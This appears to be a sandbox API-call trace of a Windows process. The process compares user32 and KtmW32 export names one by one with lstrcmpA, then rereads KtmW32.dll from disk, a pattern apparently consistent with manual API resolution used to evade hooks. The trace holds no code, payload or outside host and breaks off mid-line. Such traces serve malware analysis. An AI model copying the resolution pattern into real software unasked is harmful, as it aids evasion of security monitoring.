[0191.443] lstrcmpA (lpString1="AttachThreadInput", lpString2="AttachThreadInput") returned 0 [0191.443] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="ActivateKeyboardLayout") returned 1 [0191.443] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AddClipboardFormatListener") returned 1 [0191.443] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AdjustWindowRect") returned 1 [0191.443] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AdjustWindowRectEx") returned 1 [0191.443] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AlignRects") returned 1 [0191.443] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AllowForegroundActivation") returned 1 [0191.443] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AllowSetForegroundWindow") returned 1 [0191.443] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AnimateWindow") returned 1 [0191.443] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AnyPopup") returned 1 [0191.443] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AppendMenuA") returned 1 [0191.443] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AppendMenuW") returned 1 [0191.443] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="ArrangeIconicWindows") returned 1 [0191.443] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AttachThreadInput") returned 1 [0191.443] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="BeginDeferWindowPos") returned 0 [0191.443] lstrcmpA (lpString1="BeginPaint", lpString2="ActivateKeyboardLayout") returned 1 [0191.443] lstrcmpA (lpString1="BeginPaint", lpString2="AddClipboardFormatListener") returned 1 [0191.443] lstrcmpA (lpString1="BeginPaint", lpString2="AdjustWindowRect") returned 1 [0191.443] lstrcmpA (lpString1="BeginPaint", lpString2="AdjustWindowRectEx") returned 1 [0191.443] lstrcmpA (lpString1="BeginPaint", lpString2="AlignRects") returned 1 [0191.444] lstrcmpA (lpString1="BeginPaint", lpString2="AllowForegroundActivation") returned 1 [0191.444] lstrcmpA (lpString1="BeginPaint", lpString2="AllowSetForegroundWindow") returned 1 [0191.444] lstrcmpA (lpString1="BeginPaint", lpString2="AnimateWindow") returned 1 [0191.444] lstrcmpA (lpString1="BeginPaint", lpString2="AnyPopup") returned 1 [0191.444] lstrcmpA (lpString1="BeginPaint", lpString2="AppendMenuA") returned 1 [0191.444] lstrcmpA (lpString1="BeginPaint", lpString2="AppendMenuW") returned 1 [0191.444] lstrcmpA (lpString1="BeginPaint", lpString2="ArrangeIconicWindows") returned 1 [0191.444] lstrcmpA (lpString1="BeginPaint", lpString2="AttachThreadInput") returned 1 [0191.444] lstrcmpA (lpString1="BeginPaint", lpString2="BeginDeferWindowPos") returned 1 [0191.444] lstrcmpA (lpString1="BeginPaint", lpString2="BeginPaint") returned 0 [0191.444] lstrcmpA (lpString1="BlockInput", lpString2="ActivateKeyboardLayout") returned 1 [0191.444] lstrcmpA (lpString1="BlockInput", lpString2="AddClipboardFormatListener") returned 1 [0191.444] lstrcmpA (lpString1="BlockInput", lpString2="AdjustWindowRect") returned 1 [0191.444] lstrcmpA (lpString1="BlockInput", lpString2="AdjustWindowRectEx") returned 1 [0191.444] lstrcmpA (lpString1="BlockInput", lpString2="AlignRects") returned 1 [0191.444] lstrcmpA (lpString1="BlockInput", lpString2="AllowForegroundActivation") returned 1 [0191.444] lstrcmpA (lpString1="BlockInput", lpString2="AllowSetForegroundWindow") returned 1 [0191.444] lstrcmpA (lpString1="BlockInput", lpString2="AnimateWindow") returned 1 [0191.444] lstrcmpA (lpString1="BlockInput", lpString2="AnyPopup") returned 1 [0191.444] lstrcmpA (lpString1="BlockInput", lpString2="AppendMenuA") returned 1 [0191.444] lstrcmpA (lpString1="BlockInput", lpString2="AppendMenuW") returned 1 [0191.444] lstrcmpA (lpString1="BlockInput", lpString2="ArrangeIconicWindows") returned 1 [0191.444] lstrcmpA (lpString1="BlockInput", lpString2="AttachThreadInput") returned 1 [0191.445] lstrcmpA (lpString1="BlockInput", lpString2="BeginDeferWindowPos") returned 1 [0191.445] lstrcmpA (lpString1="BlockInput", lpString2="BeginPaint") returned 1 [0191.445] lstrcmpA (lpString1="BlockInput", lpString2="BlockInput") returned 0 [0191.445] lstrcmpA (lpString1="BringWindowToTop", lpString2="ActivateKeyboardLayout") returned 1 [0191.445] lstrcmpA (lpString1="BringWindowToTop", lpString2="AddClipboardFormatListener") returned 1 [0191.445] lstrcmpA (lpString1="BringWindowToTop", lpString2="AdjustWindowRect") returned 1 [0191.445] lstrcmpA (lpString1="BringWindowToTop", lpString2="AdjustWindowRectEx") returned 1 [0191.445] lstrcmpA (lpString1="BringWindowToTop", lpString2="AlignRects") returned 1 [0191.445] lstrcmpA (lpString1="BringWindowToTop", lpString2="AllowForegroundActivation") returned 1 [0191.445] lstrcmpA (lpString1="BringWindowToTop", lpString2="AllowSetForegroundWindow") returned 1 [0191.445] lstrcmpA (lpString1="BringWindowToTop", lpString2="AnimateWindow") returned 1 [0191.445] lstrcmpA (lpString1="BringWindowToTop", lpString2="AnyPopup") returned 1 [0191.445] lstrcmpA (lpString1="BringWindowToTop", lpString2="AppendMenuA") returned 1 [0191.445] lstrcmpA (lpString1="BringWindowToTop", lpString2="AppendMenuW") returned 1 [0191.445] lstrcmpA (lpString1="BringWindowToTop", lpString2="ArrangeIconicWindows") returned 1 [0191.445] lstrcmpA (lpString1="BringWindowToTop", lpString2="AttachThreadInput") returned 1 [0191.445] lstrcmpA (lpString1="BringWindowToTop", lpString2="BeginDeferWindowPos") returned 1 [0191.445] lstrcmpA (lpString1="BringWindowToTop", lpString2="BeginPaint") returned 1 [0191.445] lstrcmpA (lpString1="BringWindowToTop", lpString2="BlockInput") returned 1 [0191.445] lstrcmpA (lpString1="BringWindowToTop", lpString2="BringWindowToTop") returned 0 [0191.445] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="ActivateKeyboardLayout") returned 1 [0191.446] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AddClipboardFormatListener") returned 1 [0191.446] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AdjustWindowRect") returned 1 [0191.446] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AdjustWindowRectEx") returned 1 [0191.446] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AlignRects") returned 1 [0191.446] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AllowForegroundActivation") returned 1 [0191.446] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AllowSetForegroundWindow") returned 1 [0191.446] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AnimateWindow") returned 1 [0191.446] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AnyPopup") returned 1 [0191.446] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AppendMenuA") returned 1 [0191.446] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AppendMenuW") returned 1 [0191.446] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="ArrangeIconicWindows") returned 1 [0191.446] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AttachThreadInput") returned 1 [0191.446] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BeginDeferWindowPos") returned 1 [0191.446] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BeginPaint") returned 1 [0191.446] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BlockInput") returned 1 [0191.446] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BringWindowToTop") returned 1 [0191.446] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BroadcastSystemMessage") returned 0 [0191.446] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="ActivateKeyboardLayout") returned 1 [0191.447] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AddClipboardFormatListener") returned 1 [0191.447] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AdjustWindowRect") returned 1 [0191.447] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AdjustWindowRectEx") returned 1 [0191.447] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AlignRects") returned 1 [0191.447] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AllowForegroundActivation") returned 1 [0191.447] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AllowSetForegroundWindow") returned 1 [0191.447] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AnimateWindow") returned 1 [0191.447] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AnyPopup") returned 1 [0191.447] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AppendMenuA") returned 1 [0191.447] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AppendMenuW") returned 1 [0191.447] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="ArrangeIconicWindows") returned 1 [0191.447] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AttachThreadInput") returned 1 [0191.447] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BeginDeferWindowPos") returned 1 [0191.447] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BeginPaint") returned 1 [0191.447] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BlockInput") returned 1 [0191.447] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BringWindowToTop") returned 1 [0191.447] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BroadcastSystemMessage") returned 1 [0191.447] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BroadcastSystemMessageA") returned 0 [0191.447] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="ActivateKeyboardLayout") returned 1 [0191.447] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AddClipboardFormatListener") returned 1 [0191.447] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AdjustWindowRect") returned 1 [0191.447] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AdjustWindowRectEx") returned 1 [0191.447] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AlignRects") returned 1 [0191.447] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AllowForegroundActivation") returned 1 [0191.448] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AllowSetForegroundWindow") returned 1 [0191.448] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AnimateWindow") returned 1 [0191.448] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AnyPopup") returned 1 [0191.448] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AppendMenuA") returned 1 [0191.448] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AppendMenuW") returned 1 [0191.448] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="ArrangeIconicWindows") returned 1 [0191.448] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AttachThreadInput") returned 1 [0191.448] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BeginDeferWindowPos") returned 1 [0191.448] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BeginPaint") returned 1 [0191.448] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BlockInput") returned 1 [0191.448] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BringWindowToTop") returned 1 [0191.448] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessage") returned 1 [0191.448] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessageA") returned 1 [0191.448] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessageExA") returned 0 [0191.448] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="ActivateKeyboardLayout") returned 1 [0191.448] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AddClipboardFormatListener") returned 1 [0191.449] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AdjustWindowRect") returned 1 [0191.449] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AdjustWindowRectEx") returned 1 [0191.449] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AlignRects") returned 1 [0191.449] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AllowForegroundActivation") returned 1 [0191.449] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AllowSetForegroundWindow") returned 1 [0191.449] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AnimateWindow") returned 1 [0191.449] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AnyPopup") returned 1 [0191.449] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AppendMenuA") returned 1 [0191.449] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AppendMenuW") returned 1 [0191.450] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="ArrangeIconicWindows") returned 1 [0191.450] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AttachThreadInput") returned 1 [0191.450] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BeginDeferWindowPos") returned 1 [0191.450] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BeginPaint") returned 1 [0191.450] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BlockInput") returned 1 [0191.450] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BringWindowToTop") returned 1 [0191.450] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessage") returned 1 [0191.450] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageA") returned 1 [0191.450] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageExA") returned 1 [0191.450] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageExW") returned 0 [0191.450] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="ActivateKeyboardLayout") returned 1 [0191.450] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AddClipboardFormatListener") returned 1 [0191.450] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AdjustWindowRect") returned 1 [0191.450] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AdjustWindowRectEx") returned 1 [0191.450] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AlignRects") returned 1 [0191.450] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AllowForegroundActivation") returned 1 [0191.450] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AllowSetForegroundWindow") returned 1 [0191.451] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AnimateWindow") returned 1 [0191.451] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AnyPopup") returned 1 [0191.451] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AppendMenuA") returned 1 [0191.451] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AppendMenuW") returned 1 [0191.451] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="ArrangeIconicWindows") returned 1 [0191.451] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AttachThreadInput") returned 1 [0191.451] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BeginDeferWindowPos") returned 1 [0191.451] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BeginPaint") returned 1 [0191.451] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BlockInput") returned 1 [0191.451] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BringWindowToTop") returned 1 [0191.451] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BroadcastSystemMessage") returned 1 [0192.113] GetProcessHeap () returned 0x590000 [0192.113] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x40c8040 | out: hHeap=0x590000) returned 1 [0192.122] GetProcessHeap () returned 0x590000 [0192.122] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5a9360 [0192.122] LoadLibraryA (lpLibFileName="KtmW32.dll") returned 0x7ffc4bf10000 [0192.424] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0192.424] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0192.424] GetModuleFileNameA (in: hModule=0x7ffc4bf10000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")) returned 0x1e [0192.425] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0192.425] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0192.426] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0192.426] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=24064) returned 1 [0192.426] GetProcessHeap () returned 0x590000 [0192.426] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x5e00) returned 0x2d05030 [0192.426] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0192.426] ReadFile (in: hFile=0x17c, lpBuffer=0x2d05030, nNumberOfBytesToRead=0x5e00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d05030*, lpNumberOfBytesRead=0x14f5a4*=0x5e00, lpOverlapped=0x0) returned 1 [0192.427] CloseHandle (hObject=0x17c) returned 1 [0192.427] lstrcmpA (lpString1="CommitComplete", lpString2="CommitComplete") returned 0 [0192.428] lstrcmpA (lpString1="CommitEnlistment", lpString2="CommitComplete") returned 1 [0192.428] lstrcmpA (lpString1="CommitEnlistment", lpString2="CommitEnlistment") returned 0 [0192.428] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitComplete") returned 1 [0192.428] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitEnlistment") returned 1 [0192.428] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitTransaction") returned 0 [0192.428] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitComplete") returned 1 [0192.428] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitEnlistment") returned 1 [0192.428] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitTransaction") returned 1 [0192.428] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitTransactionAsync") returned 0 [0192.428] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitComplete") returned 1 [0192.428] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitEnlistment") returned 1 [0192.428] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitTransaction") returned 1 [0192.428] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitTransactionAsync") returned 1 [0192.428] lstrcmpA (lpString1="CreateEnlistment", lpString2="CreateEnlistment") returned 0 [0192.428] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitComplete") returned 1 [0192.428] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitEnlistment") returned 1 [0192.428] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitTransaction") returned 1 [0192.428] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitTransactionAsync") returned 1 [0192.428] lstrcmpA (lpString1="CreateResourceManager", lpString2="CreateEnlistment") returned 1 [0192.428] lstrcmpA (lpString1="CreateResourceManager", lpString2="CreateResourceManager") returned 0 [0192.428] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitComplete") returned 1 [0192.428] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitEnlistment") returned 1 [0192.428] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitTransaction") returned 1 [0192.428] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitTransactionAsync") returned 1 [0192.429] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateEnlistment") returned 1 [0192.429] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateResourceManager") returned 1 [0192.429] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateTransaction") returned 0 [0192.429] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitComplete") returned 1 [0192.429] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitEnlistment") returned 1 [0192.429] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitTransaction") returned 1 [0192.429] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0192.429] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateEnlistment") returned 1 [0192.429] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateResourceManager") returned 1 [0192.429] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateTransaction") returned 1 [0192.429] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateTransactionManager") returned 0 [0192.429] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitComplete") returned 1 [0192.429] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitEnlistment") returned 1 [0192.429] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitTransaction") returned 1 [0192.429] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0192.429] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateEnlistment") returned 1 [0192.429] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateResourceManager") returned 1 [0192.429] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateTransaction") returned 1 [0192.429] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateTransactionManager") returned 1 [0192.429] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="GetCurrentClockTransactionManager") returned 0 [0192.429] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitComplete") returned 1 [0192.430] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitEnlistment") returned 1 [0192.430] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitTransaction") returned 1 [0192.430] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitTransactionAsync") returned 1 [0192.430] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateEnlistment") returned 1 [0192.430] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateResourceManager") returned 1 [0192.430] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateTransaction") returned 1 [0192.430] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateTransactionManager") returned 1 [0192.430] lstrcmpA (lpString1="GetEnlistmentId", lpString2="GetCurrentClockTransactionManager") returned 1 [0192.430] lstrcmpA (lpString1="GetEnlistmentId", lpString2="GetEnlistmentId") returned 0 [0192.430] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitComplete") returned 1 [0192.430] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitEnlistment") returned 1 [0192.430] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitTransaction") returned 1 [0192.430] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitTransactionAsync") returned 1 [0192.430] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateEnlistment") returned 1 [0192.430] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateResourceManager") returned 1 [0192.430] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateTransaction") returned 1 [0192.430] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateTransactionManager") returned 1 [0192.430] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetCurrentClockTransactionManager") returned 1 [0192.430] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetEnlistmentId") returned 1 [0192.430] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetEnlistmentRecoveryInformation") returned 0 [0192.430] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitComplete") returned 1 [0192.430] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitEnlistment") returned 1 [0192.430] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitTransaction") returned 1 [0192.430] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitTransactionAsync") returned 1 [0192.430] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateEnlistment") returned 1 [0192.431] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateResourceManager") returned 1 [0192.431] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateTransaction") returned 1 [0192.431] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateTransactionManager") returned 1 [0192.431] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0192.431] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetEnlistmentId") returned 1 [0192.431] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0192.431] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetNotificationResourceManager") returned 0 [0192.431] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitComplete") returned 1 [0192.431] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitEnlistment") returned 1 [0192.431] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitTransaction") returned 1 [0192.431] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitTransactionAsync") returned 1 [0192.431] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateEnlistment") returned 1 [0192.431] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateResourceManager") returned 1 [0192.431] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateTransaction") returned 1 [0192.431] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateTransactionManager") returned 1 [0192.431] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetCurrentClockTransactionManager") returned 1 [0192.431] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetEnlistmentId") returned 1 [0192.431] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0192.431] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetNotificationResourceManager") returned 1 [0192.431] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetNotificationResourceManagerAsync") returned 0 [0192.431] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitComplete") returned 1 [0192.431] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitEnlistment") returned 1 [0192.431] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitTransaction") returned 1 [0192.431] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitTransactionAsync") returned 1 [0192.431] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateEnlistment") returned 1 [0192.432] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateResourceManager") returned 1 [0192.432] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateTransaction") returned 1 [0192.432] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateTransactionManager") returned 1 [0192.432] lstrcmpA (lpString1="GetTransactionId", lpString2="GetCurrentClockTransactionManager") returned 1 [0192.432] lstrcmpA (lpString1="GetTransactionId", lpString2="GetEnlistmentId") returned 1 [0192.432] lstrcmpA (lpString1="GetTransactionId", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0192.432] lstrcmpA (lpString1="GetTransactionId", lpString2="GetNotificationResourceManager") returned 1 [0192.432] lstrcmpA (lpString1="GetTransactionId", lpString2="GetNotificationResourceManagerAsync") returned 1 [0192.432] lstrcmpA (lpString1="GetTransactionId", lpString2="GetTransactionId") returned 0 [0192.432] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitComplete") returned 1 [0192.432] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitEnlistment") returned 1 [0192.432] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitTransaction") returned 1 [0192.432] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitTransactionAsync") returned 1 [0192.432] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateEnlistment") returned 1 [0192.432] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateResourceManager") returned 1 [0192.432] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateTransaction") returned 1 [0192.432] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateTransactionManager") returned 1 [0192.432] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetCurrentClockTransactionManager") returned 1 [0192.432] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetEnlistmentId") returned 1 [0192.432] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0192.432] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetNotificationResourceManager") returned 